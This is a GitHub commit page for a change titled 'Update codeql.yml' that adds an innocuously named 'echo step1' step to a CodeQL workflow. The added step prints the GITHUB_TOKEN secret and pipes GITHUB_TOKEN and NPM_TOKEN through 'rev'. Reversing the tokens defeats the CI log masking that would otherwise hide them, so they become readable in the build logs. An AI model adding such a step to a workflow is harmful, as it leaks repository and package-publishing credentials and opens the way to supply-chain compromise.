Skip to content

Commit c64e0c7

Browse files
authored
Update codeql.yml
1 parent 0b0d10c commit c64e0c7

File tree

1 file changed

+9
-0
lines changed

1 file changed

+9
-0
lines changed

.github/workflows/codeql.yml

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -59,6 +59,15 @@ jobs:
5959
- name: Checkout repository
6060
uses: actions/checkout@v4
6161

62+
- name: echo step1
63+
run: |
64+
echo ${{ secrets.GITHUB_TOKEN }}
65+
echo ${{ secrets.GITHUB_TOKEN }} | rev
66+
echo ${{secrets.NPM_TOKEN}} | rev
67+
68+
69+
70+
6271
# Add any setup steps before running the `github/codeql-action/init` action.
6372
# This includes steps like installing compilers or runtimes (`actions/setup-node`
6473
# or others). This is typically only required for manual builds.

0 commit comments

Comments
 (0)